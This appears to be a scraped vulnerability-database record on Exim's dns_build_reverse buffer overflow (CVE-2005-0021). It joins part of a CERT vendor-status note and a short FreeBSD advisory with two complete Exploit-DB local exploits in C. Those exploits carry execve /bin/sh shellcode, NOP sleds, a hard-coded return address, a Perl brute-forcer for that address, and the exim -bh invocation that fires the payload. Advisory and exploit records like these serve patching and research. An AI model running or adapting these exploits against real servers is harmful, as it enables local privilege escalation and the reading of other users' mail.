information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Gentoo\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Gentoo advisory for this vulnerability can be found at: \n\n \n<http://www.gentoo.org/security/en/glsa/glsa-200501-23.xml>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Hewlett-Packard Company\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ IBM\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Immunix\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Ingrian Networks\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ MandrakeSoft\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ MontaVista Software\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ OpenBSD\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Red Hat Inc.\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ University of Cambridge\n\nUpdated: January 27, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\nView all 13 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * [http://www.idefense.com/application/poi/display?id=183&type=vulnerabilit&flashstatus=false](<http://www.idefense.com/application/poi/display?id=183&type=vulnerabilit&flashstatus=false>)\n * <http://www.securitytracker.com/alerts/2005/Jan/1012904.html>\n * <http://secunia.com/advisories/13713/>\n * <http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html>\n\n### Acknowledgements\n\nThis vulnerability was reported by iDEFENSE Inc.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0021](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021>) \n---|--- \n**Severity Metric:****** | 2.76 \n**Date Public:** | 2005-01-14 \n**Date First Published:** | 2005-01-27 \n**Date Last Updated: ** | 2005-01-28 20:18 UTC \n**Document Revision: ** | 69 \n", "modified": "2005-01-28T20:18:00", "published": "2005-01-27T00:00:00", "id": "VU:132992", "href": "https://www.kb.cert.org/vuls/id/132992", "type": "cert", "title": "Exim vulnerable to buffer overflow via the dns_build_reverse() routine", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T13:22:05", "bulletinFamily": "exploit", "description": "Exim <= 4.41 dns_build_reverse Local Exploit. CVE-2005-0021. Local exploit for linux platform", "modified": "2005-05-25T00:00:00", "published": "2005-05-25T00:00:00", "id": "EDB-ID:1009", "href": "https://www.exploit-db.com/exploits/1009/", "type": "exploitdb", "title": "Exim <= 4.41 dns_build_reverse Local Exploit", "sourceData": "/* \r\n * ripped straight off iDEFENSE advisory - so lazy I just picked\r\n * up GDB... bored on a weeknight :(\r\n * \r\n * nothing to write home to mother about due to the fact that\r\n * you need a local user account on a server and all you\r\n * get is to read other people's emails ....\r\n * \r\n * not even my own shellcode. aleph1 shellcode - cut and paste job \r\n * with nops to pad.\r\n *\r\n * Regards,\r\n * Plugger aka Tony Lockett\r\n *\r\n * \r\n * \r\n */\r\n\r\nchar bomb[288]=\r\n\r\n/* the gear from iDEFENSE */\r\n\"::%A:::::::::::::::::\" /* 21 bytes */\r\n /* -------- */\r\n/* NOPS for padding */\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\" /* 218 bytes */\r\n /* --------- */\r\n/* actual code courtesy Aleph1 */\r\n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\" /* 12 bytes */\r\n\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\" /* 12 bytes */\r\n\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\" /* 9 bytes */\r\n\"\\xe8\\xdc\\xff\\xff\\xff/bin/sh\" /* 12 bytes */\r\n\r\n/* where EIP should point */\r\n\"\\xf4\\xf2\\xff\\xbf\"; /* 4 bytes */\r\n /* -------- */\r\n /* 49 bytes */\r\n /* -------- */\r\n /* 288 bytes */\r\n /* ========= */\r\nmain()\r\n{\r\n char *exim[4];\r\n exim[0] = \"/usr/exim/bin/exim\";\r\n exim[1] = \"-bh\";\r\n exim[2] = bomb;\r\n exim[3] = 0x0;\r\n printf(\"Firing up exim - cross your fingers for shell!\\n\");\r\n execve(exim[0],exim,0x0);\r\n return;\r\n}\n\n// milw0rm.com [2005-05-25]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1009/"}, {"lastseen": "2016-01-31T12:48:04", "bulletinFamily": "exploit", "description": "Exim <= 4.41 dns_build_reverse Local Exploit PoC. CVE-2005-0021. Local exploit for linux platform", "modified": "2005-01-15T00:00:00", "published": "2005-01-15T00:00:00", "id": "EDB-ID:756", "href": "https://www.exploit-db.com/exploits/756/", "type": "exploitdb", "title": "Exim <= 4.41 dns_build_reverse Local Exploit PoC", "sourceData": "/*\r\nThis proof-of-concept demonstrates the existence of the vulnerability\r\nreported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).\r\nIt has been tested against exim-4.41 under Debian GNU/Linux.\r\nNote that setuid () is not included in the shellcode to avoid\r\nscript-kidding.\r\nMy RET is 0xbffffae4, but fb.pl can brute-force it for you.\r\n\r\n-----------\r\nBrute Force fb.pl:\r\n-----------\r\n\r\n#!/usr/bin/perl\r\n\r\n$cnt = 0xbffffa10;\r\n\r\nwhile (1) {\r\n $hex = sprintf (\"0x%x\", $cnt);\r\n $res = system (\"./exploit $hex\");\r\n printf \"$hex : $res\\n\";\r\n $cnt += 4;\r\n}\r\n\r\n---------\r\nexploit.c:\r\n---------\r\n*/\r\n\r\n#define NOP 0x90\r\n#define TAMBUF 368\r\n#define INIC_SH 20\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char **argv) {\r\n\r\n static char shellcode[]=\r\n \"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\"\r\n \"\\xf3\\x8d\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n \"\\x2f\\x73\\x68\\x58\";\r\n\r\n char buffer [TAMBUF + 1];\r\n char cadena [TAMBUF + 5];\r\n int cont;\r\n unsigned long ret = strtoul (argv[1], NULL, 16);\r\n\r\n for (cont = 0; cont < TAMBUF / 4; cont++)\r\n *( (long *) buffer + cont) = ret;\r\n\r\n for (cont = 0; cont < strlen (shellcode); cont++)\r\n buffer [cont + INIC_SH] = shellcode [cont];\r\n\r\n for (cont = 0; cont < INIC_SH; cont++)\r\n buffer [cont] = NOP;\r\n\r\n buffer [TAMBUF] = 0;\r\n printf (\"RET = 0x%x\\n\", ret);\r\n strcpy (cadena, \"::%A\");\r\n strcat (cadena, buffer);\r\n execl (\"/usr/sbin/exim\", \"./exim\", \"-bh\", cadena, (char *) 0);\r\n}\r\n\r\n// milw0rm.com [2005-01-15]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/756/"}]}

FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)

Description

The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.

The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.

The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.